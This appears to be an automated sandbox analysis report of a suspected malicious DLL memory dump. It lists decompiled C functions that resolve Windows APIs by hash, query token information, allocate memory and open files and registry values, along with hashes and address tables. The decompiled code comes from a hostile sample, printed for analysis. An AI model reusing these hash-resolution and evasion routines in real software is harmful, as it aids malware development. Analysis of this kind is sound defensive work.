0x00000000
0x6e9f0fac
0x6e9f0bee
0x6e9f0bee
0x6e9f0bf3
0x6e9f0bf9
0x6e9f0bf9
0x00000000
0x6e9f0bf3
0x6e9f0be8
0x6e9f08bc
0x6e9f082c
0x6e9f082d
0x6e9f082f
0x6e9f0835
0x6e9f0e02
0x6e9f0e07
0x6e9f0e09
0x00000000
0x00000000
0x6e9f0e0f
0x6e9f084c
0x6e9f0850
0x6e9f0855
0x6e9f086b
0x6e9f0882
0x6e9f0886
0x6e9f0c7e
0x6e9f0c7e
0x6e9f0886
0x6e9f088c
0x6e9f0895
0x6e9f0c8d
0x6e9f0c9e
0x6e9f0ca3
0x6e9f0ca5
0x6e9f0ca7
0x6e9f0dd8
0x6e9f0ddc
0x00000000
0x6e9f0ddc
0x6e9f0cb3
0x6e9f0cd8
0x6e9f0cda
0x6e9f0cdc
0x6e9f0df4
0x6e9f0df9
0x6e9f0dfb
0x00000000
0x00000000
0x6e9f0dfd
0x6e9f0ced
0x6e9f0cfb
0x6e9f0d02
0x6e9f0d03
0x6e9f0d04
0x6e9f0d16
0x6e9f0d18
0x6e9f0d1a
0x00000000
0x00000000
0x6e9f0d22
0x6e9f0d3d
0x6e9f0d3f
0x6e9f0d41
0x6e9f0de6
0x6e9f0deb
0x6e9f0ded
0x00000000
0x00000000
0x6e9f0def
0x6e9f0d47
0x6e9f0d4e
0x6e9f0d52
0x6e9f0dbd
0x6e9f0dbd
0x6e9f0dbf
0x6e9f0dc6
0x6e9f0dc6
0x6e9f0dcc
0x6e9f0dcc
0x6e9f0dce
0x6e9f0dd3
0x6e9f0dd3
0x00000000
0x6e9f0dce
0x6e9f0dc1
0x6e9f0dc4
0x6e9f0dca
0x6e9f0dca
0x00000000
0x6e9f0dca
0x00000000
0x6e9f0dc4
0x6e9f0d54
0x6e9f0d54
0x6e9f0d56
0x6e9f0d62
0x6e9f0d67
0x6e9f0d69
0x00000000
0x00000000
0x6e9f0d6b
0x6e9f0d6f
0x6e9f0d76
0x6e9f0d77
0x6e9f0d78
0x6e9f0d7a
0x00000000
0x00000000
0x6e9f0d7c
0x6e9f0d7e
0x6e9f0d85
0x6e9f0d85
0x6e9f0d8b
0x6e9f0d8b
0x6e9f0d8d
0x6e9f0d92
0x6e9f0d92
0x6e9f0d9b
0x6e9f0da0
0x6e9f0da5
0x6e9f0dab
0x6e9f0dab
0x6e9f0db0
0x00000000
0x6e9f0db0
0x6e9f0d80
0x6e9f0d83
0x6e9f0d89
0x6e9f0d89
0x00000000
0x6e9f0d89
0x00000000
0x6e9f0db7
0x6e9f0db7
0x6e9f0db8
0x6e9f0db8
0x00000000
0x6e9f0d56
0x6e9f089b
0x6e9f08a0
0x6e9f08a6
0x6e9f08a6
0x00000000
0x6e9f0c7d
0x6e9f0c7d
0x6e9f0c7d

APIs

GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7), ref: 6E9F0882
GetSystemInfo.KERNELBASE(?,10154545,10154545,?,?,A89C042F,?,?,80C4A2B7,?,?,5E9822CF,00000000,80000002,00000000,-000000FC), ref: 6E9F0C44
GetTokenInformation.KERNELBASE(?,00000002,00000000,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,8B9D0DA7,8B9D0DA7), ref: 6E9F0CD8

Strings

J}*, xrefs: 6E9F0D5B

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken$InfoSystem
String ID: J}*
API String ID: 298373132-3566034359
Opcode ID: 433b4fca06ed2444c62c4fc405e1719059799f6a0a0713c08ff41623b1ee0853
Instruction ID: f2e4dbbae7f79c0542471d077438d98252900e98575064b3c49fab4c59d067c0
Opcode Fuzzy Hash: 433b4fca06ed2444c62c4fc405e1719059799f6a0a0713c08ff41623b1ee0853
Instruction Fuzzy Hash: 8522B070608341EFEB61DAA4C850BEB77ADAFD1308F108D19E5999B294EB30D947CF52

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F223C, Relevance: 1.5, APIs: 1, Instructions: 30
nativeCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E6E9F223C(void* __ecx, intOrPtr __edx, void* __esi) {
				intOrPtr _v4;
				intOrPtr _v20;
				intOrPtr* _t5;
				intOrPtr _t11;
				intOrPtr* _t13;
				intOrPtr* _t15;

				_t11 = __edx;
				if(__ecx == 0) {
					 *_t15 = 0;
					_v4 = 0;
				} else {
					 *_t15 = E6E9F3AD0(0xffffd8f0, 0xffffffff, __ecx, 0);
					_v20 = _t11;
				}
				_t5 = E6E9F3044(0xfe338407, 0x8f5bb83f, 0xfe338407, 0xfe338407);
				_t13 = _t5;
				if(_t13 != 0) {
					_t5 =  *_t13(0, _t15); // executed
				}
				return _t5;
			}

0x6e9f223c
0x6e9f2240
0x6e9f225c
0x6e9f225f
0x6e9f2242
0x6e9f2251
0x6e9f2254
0x6e9f2254
0x6e9f226f
0x6e9f2274
0x6e9f2278
0x6e9f2280
0x6e9f2280
0x6e9f2284

APIs

NtDelayExecution.NTDLL(00000000,00000000,FE338407,FE338407,FFFFFFFF,FFFFFFFF,6E9E355F,00000000,00000000,?), ref: 6E9F2280

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: DelayExecution
String ID:
API String ID: 1249177460-0
Opcode ID: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction ID: d3cc2daf1b6fc467c8b6fb27ac646ffa2949b0bae6cfb4a2c68d276888eb4dc1
Opcode Fuzzy Hash: db212ea4dfa68ed3d9912cf2bef15392d4988c166d1d2ad10caf7cac4354cdb6
Instruction Fuzzy Hash: 9EE065B060D242ADE648DBA94D05F7B76DC9F94710F20892DB055C7184E734C4028B62

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F2840, Relevance: 1.5, APIs: 1, Instructions: 29
memorynativeCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E9F2840(void* __ecx, long __edx, void* __esi, long _a4, long _a8, void* _a12) {
				long _v4;
				void* _t8;
				long _t10;
				PVOID* _t19;

				_v4 = __edx;
				 *_t19 = __ecx;
				if(E6E9F3044(0xfe338407, 0x9a85f5ac, 0xfe338407, 0xfe338407) == 0) {
					L3:
					_t8 =  *_t19;
				} else {
					_t10 = NtAllocateVirtualMemory(_a12, _t19, 0,  &_v4, _a4, _a8); // executed
					if(_t10 == 0) {
						goto L3;
					} else {
						_t8 = 0;
					}
				}
				return _t8;
			}

0x6e9f2847
0x6e9f2850
0x6e9f285e
0x6e9f2881
0x6e9f2881
0x6e9f2860
0x6e9f2877
0x6e9f287b
0x00000000
0x6e9f287d
0x6e9f287d
0x6e9f287d
0x6e9f287b
0x6e9f2886

APIs

NtAllocateVirtualMemory.NTDLL(6E9F88BE,?,00000000,000000FF,6E9F88BE,6E9F88BE,FE338407,FE338407,?,?,6E9F88BE,00003000,00000004,000000FF), ref: 6E9F2877

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: AllocateMemoryVirtual
String ID:
API String ID: 2167126740-0
Opcode ID: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction ID: 3126dfe6efa06db7330f83e7847ba58bc1fcfc4a418b717c95f5dc294bf9809d
Opcode Fuzzy Hash: f3de004074fa0178ab962fca098d2182b0b14321d406f2325e43184ef25fdc64
Instruction Fuzzy Hash: DAE01571209383EFEB08DAA4CC14EBBBAEDAF84304F108C1DB494C6150DB32D821DB22

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F3110, Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

C-Code - Quality: 37%

			E6E9F3110(intOrPtr* __ecx) {
				void* _t1;

				_push(E6E9F3488);
				_push(1); // executed
				_t1 =  *__ecx(); // executed
				return _t1;
			}

0x6e9f3110
0x6e9f3115
0x6e9f3117
0x6e9f3119

APIs

RtlAddVectoredExceptionHandler.NTDLL(00000001,6E9F3488,6E9F3100,FE338407,FE338407,?,6E9E6CB9,00000000), ref: 6E9F3117

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: ExceptionHandlerVectored
String ID:
API String ID: 3310709589-0
Opcode ID: d466a19323d6cec7395cfe7a225b3d35dc2d4ade065d71b0e0797c76e60897de
Instruction ID: 5a395b0634bbc9f3882ab6d5d71ee48fb9b3304ddb820e6b718ba0874c512f2d
Opcode Fuzzy Hash: d466a19323d6cec7395cfe7a225b3d35dc2d4ade065d71b0e0797c76e60897de
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F10C8, Relevance: 3.2, APIs: 2, Instructions: 153
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E6E9F10C8(void* __ecx) {
				long _v12;
				void* _v20;
				void* _v24;
				long _v32;
				void* _v40;
				void* _v44;
				char _v48;
				char _v52;
				void* _v56;
				void* _v64;
				void* _v88;
				void* _v92;
				int _t33;
				signed char* _t35;
				intOrPtr* _t40;
				intOrPtr _t41;
				long* _t50;
				intOrPtr* _t59;
				intOrPtr* _t65;
				void* _t66;
				void* _t68;
				void* _t69;
				signed char* _t70;
				void* _t72;
				long* _t74;

				_t74 =  &_v32;
				_t69 = __ecx;
				_v12 = 0;
				_t59 = E6E9F3044(0x8b9d0da7, 0x8335dc52, 0x8b9d0da7, 0x8b9d0da7);
				if(_t59 != 0) {
					 *_t59(_t69, 8,  &_v12);
				}
				_t50 = _t74;
				 *_t50 = _v12;
				_t50[1] = 1;
				if(E6E9EC2C4(_t50) != 0) {
					L6:
					if(_t74[1] != 0) {
						E6E9EBB88(_t74);
					}
					return 0;
				} else {
					_t74[6] = 0;
					if(E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) != 0) {
						GetTokenInformation(_v40, 0x19, 0, 0,  &(_t74[6])); // executed
					}
					_t26 = _t74[6];
					if(_t74[6] != 0) {
						E6E9EF5A8( &_v32, _t26);
						_t68 = E6E9EF4E0( &(_t74[3]), 0);
						if(E6E9F3044(0x8b9d0da7, 0x6ca672fa, 0x8b9d0da7, 0x8b9d0da7) == 0) {
							L32:
							E6E9EF678( &_v32);
							goto L6;
						}
						_t33 = GetTokenInformation(_v40, 0x19, _t68, _t74[7],  &(_t74[6])); // executed
						if(_t33 == 0) {
							goto L32;
						}
						_t35 = E6E9F3044(0x8b9d0da7, 0xc660b8b, 0x8b9d0da7, 0x8b9d0da7);
						if(_t35 == 0) {
							goto L32;
						}
						_push( *_t68);
						asm("int3");
						asm("int3");
						_t70 = _t35;
						if(_t70 == 0) {
							goto L32;
						}
						_t65 = E6E9F3044(0x8b9d0da7, 0x86f13b09, 0x8b9d0da7, 0x8b9d0da7);
						if(_t65 == 0) {
							goto L32;
						}
						_t40 =  *_t65( *_t68, ( *_t70 & 0x000000ff) - 1);
						if(_t40 == 0) {
							goto L32;
						}
						_t41 =  *_t40;
						if(_t41 == 0) {
							_t72 = 1;
						} else {
							if(_t41 == 0x1000) {
								_t72 = 2;
							} else {
								if(_t41 == 0x2100) {
									_t72 = 4;
								} else {
									if(_t41 == 0x2000) {
										_t72 = 3;
									} else {
										if(_t41 == 0x3000) {
											_t72 = 5;
										} else {
											if(_t41 == 0x4000) {
												_t72 = 6;
											} else {
												_t66 = 7;
												_t72 =  ==  ? _t66 : 0;
											}
										}
									}
								}
							}
						}
						E6E9EF678( &_v48);
						if(_v52 != 0) {
							E6E9EBB88(_t74);
						}
						return _t72;
					}
					goto L6;
				}
			}

0x6e9f10ca
0x6e9f10d7
0x6e9f10d9
0x6e9f10e8
0x6e9f10ec
0x6e9f10f6
0x6e9f10f6
0x6e9f10fc
0x6e9f10ff
0x6e9f1101
0x6e9f110c
0x6e9f1146
0x6e9f114b
0x6e9f1150
0x6e9f1150
0x00000000
0x6e9f110e
0x6e9f1118
0x6e9f112b
0x6e9f113c
0x6e9f113c
0x6e9f113e
0x6e9f1144
0x6e9f1162
0x6e9f1172
0x6e9f1189
0x6e9f126b
0x6e9f126f
0x00000000
0x6e9f126f
0x6e9f119f
0x6e9f11a3
0x00000000
0x00000000
0x6e9f11b5
0x6e9f11bc
0x00000000
0x00000000
0x6e9f11c2
0x6e9f11c4
0x6e9f11c5
0x6e9f11c6
0x6e9f11ca
0x00000000
0x00000000
0x6e9f11e1
0x6e9f11e5
0x00000000
0x00000000
0x6e9f11f2
0x6e9f11f6
0x00000000
0x00000000
0x6e9f11f8
0x6e9f11fc
0x6e9f124b
0x6e9f11fe
0x6e9f1203
0x6e9f1246
0x6e9f1205
0x6e9f120a
0x6e9f1241
0x6e9f120c
0x6e9f1211
0x6e9f123c
0x6e9f1213
0x6e9f1218
0x6e9f1237
0x6e9f121a
0x6e9f121f
0x6e9f1232
0x6e9f1221
0x6e9f1223
0x6e9f122b
0x6e9f122b
0x6e9f121f
0x6e9f1218
0x6e9f1211
0x6e9f120a
0x6e9f1203
0x6e9f1250
0x6e9f125a
0x6e9f125f
0x6e9f125f
0x00000000
0x6e9f1264
0x00000000
0x6e9f1144

APIs

GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E9F113C
GetTokenInformation.KERNELBASE(?,00000019,00000000,00000000,00000000,8B9D0DA7,8B9D0DA7,00000000,00000000,8B9D0DA7,8B9D0DA7,8B9D0DA7,8B9D0DA7), ref: 6E9F119F

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: InformationToken
String ID:
API String ID: 4114910276-0
Opcode ID: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction ID: 55117bfb47c8c474d572630cda3871a26ee9ae4376880ac538ee69cd5d255eb8
Opcode Fuzzy Hash: c3dc9b7fe7cd93b30242d8f3ceac6aa5c807eefe08534b10b92fe5e24778250c
Instruction Fuzzy Hash: 1541E8B0244342EBE75295EACC60BEB669D9FD2708F208829F550C61D6DB24CD4BCFD1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F578C, Relevance: 3.1, APIs: 2, Instructions: 74
registryCOMMON

Download Yara Rule

C-Code - Quality: 94%

			E6E9F578C(void* __ecx, char* _a4, intOrPtr _a8) {
				int _v16;
				int _v20;
				intOrPtr _t11;
				int* _t12;
				int _t13;
				void* _t23;
				char* _t35;
				int* _t38;

				_push(_t34);
				_t23 = __ecx;
				_t11 =  *((intOrPtr*)(__ecx + 4));
				if(_t11 == 0 || _t11 == 0xffffffff) {
					_t12 = 1;
				} else {
					_t12 = 0;
				}
				if(_t12 != 0) {
					L10:
					_t13 = 0;
				} else {
					_t35 = _a4;
					if(_t35 == 0 ||  *_t35 != 0) {
						_v20 = 0;
						_v16 = 0;
						if(E6E9F303C(0x8b9d0da7, 0xcaca77b9) != 0) {
							RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, 0,  &_v16); // executed
						}
						_t15 = _v16;
						if(_v16 != 0) {
							E6E9EF84C(_a8, _t15);
							if(E6E9F303C(0x8b9d0da7, 0xcaca77b9) != 0) {
								RegQueryValueExA( *(_t23 + 4), _t35, 0, _t38, E6E9EF4E0(_a8, 0),  &_v20); // executed
							}
							_t13 = _v20;
						} else {
							goto L10;
						}
					} else {
						goto L10;
					}
				}
				return _t13;
			}

0x6e9f5790
0x6e9f5791
0x6e9f5793
0x6e9f5798
0x6e9f579f
0x6e9f57a3
0x6e9f57a3
0x6e9f57a3
0x6e9f57a7
0x6e9f57ed
0x6e9f57ed
0x6e9f57a9
0x6e9f57a9
0x6e9f57af
0x6e9f57b8
0x6e9f57bb
0x6e9f57d2
0x6e9f57e3
0x6e9f57e3
0x6e9f57e5
0x6e9f57eb
0x6e9f57f6
0x6e9f580e
0x6e9f582e
0x6e9f582e
0x6e9f5830
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x6e9f57af
0x6e9f5838

APIs

RegQueryValueExA.KERNELBASE(?,6E9FD1F8,00000000,?,00000000,00000000,?,?,?,6E9FD1F8,?,6E9F585F,?,00000000,00000000), ref: 6E9F57E3
RegQueryValueExA.KERNELBASE(?,6E9FD1F8,00000000,?,00000000,00000000,00000000,00000000,?,?,?,6E9FD1F8,?,6E9F585F,?,00000000), ref: 6E9F582E

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction ID: 002d60953c2decaad3b7950d28efd7290a283aad2a0c0cc1863629d4e9458c6f
Opcode Fuzzy Hash: 374863256b0e4b882093bf6f263c3d082ec5091167468ad574677fa6ce860210
Instruction Fuzzy Hash: 77117F7060C306EBD751DAA5DC90EAB7BECEF91658F00C91EB598D7145EA21EC028BB1

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5B14, Relevance: 1.6, APIs: 1, Instructions: 123
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E6E9F5B14(WCHAR** __ecx, void* __edx, intOrPtr _a4, long _a8, long _a12) {
				char _v24;
				void* __esi;
				void* _t16;
				void* _t30;
				long _t37;
				void* _t38;
				long _t39;
				WCHAR** _t40;
				intOrPtr* _t55;
				WCHAR** _t56;
				char* _t59;
				long _t60;

				_t56 = __ecx;
				_t37 = _a8;
				if(E6E9ED210(__ecx, 0x2f) != 0) {
					_t58 = _t60;
					E6E9ED714(__ecx, _t60);
					E6E9ED03C(_t56,  *_t60);
					E6E9ED020(_t60);
				}
				if(_t37 == 0) {
					_t64 = _a4 - 1;
					if(_a4 != 1) {
						__eflags = _a4 - 4;
						_t37 = (0 | _a4 == 0x00000004) + 2;
						__eflags = _t37;
					} else {
						_t37 = 1;
					}
				}
				E6E9F6288(_t64);
				if(_a4 > 5) {
					_t58 = 0;
					if(_t37 != 2) {
						_t16 = 3;
						__eflags = _t37 - 1;
						_t38 = 0;
						_t39 =  ==  ? _t16 : _t38;
					} else {
						_t39 = 1;
					}
					if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t30 = CreateFileW( *_t56, 0, _t39, 0, _t58, _a12, 0); // executed
						_push(_t30);
					}
					_t40 =  &(_t56[3]);
					E6E9EC2B0(_t40);
					if(E6E9EC2C4(_t40) != 0) {
						_t56[2] = E6E9F35C8(0);
						return 0;
					} else {
						if(_a4 == 2) {
							_t55 = E6E9F303C(0x10154545, 0x95343033);
							__eflags = _t55;
							if(_t55 != 0) {
								 *_t55( *_t40, 0, 0, 2);
							}
						}
						_t59 =  &_v24;
						E6E9F3670(_t59, 0xff, 8);
						if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
							_push(_t59);
							_push(_t59);
							_push(0);
							_push( *_t40);
							asm("int3");
							asm("int3");
						}
						return 1;
					}
				} else {
					goto __eax;
				}
			}

0x6e9f5b1b
0x6e9f5b1d
0x6e9f5b2a
0x6e9f5b2e
0x6e9f5b32
0x6e9f5b3c
0x6e9f5b43
0x6e9f5b43
0x6e9f5b4a
0x6e9f5b4c
0x6e9f5b51
0x6e9f5b5a
0x6e9f5b62
0x6e9f5b62
0x6e9f5b53
0x6e9f5b55
0x6e9f5b55
0x6e9f5b51
0x6e9f5b67
0x6e9f5b73
0x6e9f5ca4
0x6e9f5be1
0x6e9f5bea
0x6e9f5beb
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x00000000
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c86
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
0x6e9f5c67
0x00000000
0x6e9f5c6a
0x6e9f5b79
0x6e9f5b89
0x6e9f5b89

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2a9574620d014b68d335c33a8af938d8f290c75c6a076206f5e717d1de8ab336
Instruction ID: 9cb87036a3151c4f288cef915ab2c8cd86cc57fa7a0749bb13d3c0e44a9c1707
Opcode Fuzzy Hash: 2a9574620d014b68d335c33a8af938d8f290c75c6a076206f5e717d1de8ab336
Instruction Fuzzy Hash: B331F47034420AEFE7506AF18C85F7B769DDFD224DF148C28FA529A181DA21CD078F21

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5B95, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6E9F5B95(void* __ebx, void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				void* _t31;
				intOrPtr* _t33;
				WCHAR** _t34;
				void* _t38;
				long _t39;
				void* _t41;
				void* _t42;

				_t34 = __edi;
				_t31 = 5;
				_t38 = 2;
				_t39 =  !=  ? _t31 : _t38;
				if(__ebx != 2) {
					_t7 = 3;
					_t22 = 0;
					_t23 =  ==  ? _t7 : _t22;
				} else {
					_t23 = 1;
				}
				if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
					_push(0);
				} else {
					_t20 = CreateFileW( *_t34, 0xc0000000, _t23, 0, _t39, _a44, 0); // executed
					_push(_t20);
				}
				_t24 =  &(_t34[3]);
				E6E9EC2B0(_t24);
				if(E6E9EC2C4(_t24) != 0) {
					_t34[2] = E6E9F35C8(0xc0000000);
					_t12 = 0;
				} else {
					if( *((intOrPtr*)(_t42 + 0x24)) == 2) {
						_t33 = E6E9F303C(0x10154545, 0x95343033);
						if(_t33 != 0) {
							 *_t33( *_t24, 0, 0, 2);
						}
					}
					_t41 = _t42 + 8;
					E6E9F3670(_t41, 0xff, 8);
					_t42 = _t42 + 0xc;
					if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
						_push(_t41);
						_push(_t41);
						_push(0);
						_push( *_t24);
						asm("int3");
						asm("int3");
					}
					_t12 = 1;
				}
				return _t12;
			}

0x6e9f5b95
0x6e9f5b99
0x6e9f5b9c
0x6e9f5b9f
0x6e9f5be1
0x6e9f5bea
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x6e9f5c9e
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c4a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
0x6e9f5c67
0x6e9f5c6a
0x6e9f5c6a
0x6e9f5c72

APIs

CreateFileW.KERNELBASE(?,00000000,00000000,00000000,00000000,?,00000000,10154545,DB1C336E), ref: 6E9F5C16

Memory Dump Source

Source File: 00000004.00000002.692542013.000000006E9E1000.00000020.00020000.sdmp, Offset: 6E9E0000, based on PE: true

Associated: 00000004.00000002.692531722.000000006E9E0000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692700485.000000006E9FA000.00000002.00020000.sdmp Download File
Associated: 00000004.00000002.692717910.000000006E9FD000.00000004.00020000.sdmp Download File
Associated: 00000004.00000002.692774926.000000006E9FF000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction ID: 4e25cebfd11227079709103f2b8fd47306195ffd42bcc6100a03a5dea1450c8e
Opcode Fuzzy Hash: 4e60b51493a919b9ab3b1fbe95255e1ef887842d4da31704ea387d1a5e3b98bf
Instruction Fuzzy Hash: EF01456138020AFFF75056E15C41FBB378CDFD224DF008826BA219A181DE26CC478A21

Uniqueness

Uniqueness Score: -1.00%

Function 6E9F5BBD, Relevance: 1.6, APIs: 1, Instructions: 65
fileCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E6E9F5BBD(void* __ecx, void* __edx, WCHAR** __edi, void* _a4, void* _a32, long _a44) {
				void* _t7;
				void* _t12;
				void* _t20;
				void* _t21;
				void* _t22;
				long _t23;
				WCHAR** _t24;
				intOrPtr* _t32;
				WCHAR** _t33;
				long _t37;
				void* _t39;
				void* _t40;

				_t33 = __edi;
				if(__edx != 0) {
					_t37 = 3;
					if(_t21 != 2) {
						_t7 = 3;
						_t22 = 0;
						_t23 =  ==  ? _t7 : _t22;
					} else {
						_t23 = 1;
					}
					if(E6E9F303C(0x10154545, 0xdb1c336e) == 0) {
						_push(0);
					} else {
						_t20 = CreateFileW( *_t33, 0x80000000, _t23, 0, _t37, _a44, 0); // executed
						_push(_t20);
					}
					_t24 =  &(_t33[3]);
					E6E9EC2B0(_t24);
					if(E6E9EC2C4(_t24) != 0) {
						_t33[2] = E6E9F35C8(0x80000000);
						_t12 = 0;
					} else {
						if( *((intOrPtr*)(_t40 + 0x24)) == 2) {
							_t32 = E6E9F303C(0x10154545, 0x95343033);
							if(_t32 != 0) {
								 *_t32( *_t24, 0, 0, 2);
							}
						}
						_t39 = _t40 + 8;
						E6E9F3670(_t39, 0xff, 8);
						_t40 = _t40 + 0xc;
						if(E6E9F303C(0x10154545, 0x5b739044) != 0) {
							_push(_t39);
							_push(_t39);
							_push(0);
							_push( *_t24);
							asm("int3");
							asm("int3");
						}
						_t12 = 1;
					}
				} else {
					__edi[2] = 2;
					_t12 = 0;
				}
				return _t12;
			}

0x6e9f5bbd
0x6e9f5bbf
0x6e9f5bd6
0x6e9f5be1
0x6e9f5bea
0x6e9f5bf0
0x6e9f5bf1
0x6e9f5be3
0x6e9f5be5
0x6e9f5be5
0x6e9f5c07
0x6e9f5c1b
0x6e9f5c09
0x6e9f5c16
0x6e9f5c18
0x6e9f5c18
0x6e9f5c1d
0x6e9f5c22
0x6e9f5c30
0x6e9f5c9b
0x6e9f5c9e
0x6e9f5c32
0x6e9f5c37
0x6e9f5c84
0x6e9f5c88
0x6e9f5c92
0x6e9f5c92
0x6e9f5c88
0x6e9f5c39
0x6e9f5c45
0x6e9f5c4a
0x6e9f5c5e
0x6e9f5c60
0x6e9f5c61
0x6e9f5c62
0x6e9f5c64
0x6e9f5c66
0x6e9f5c67
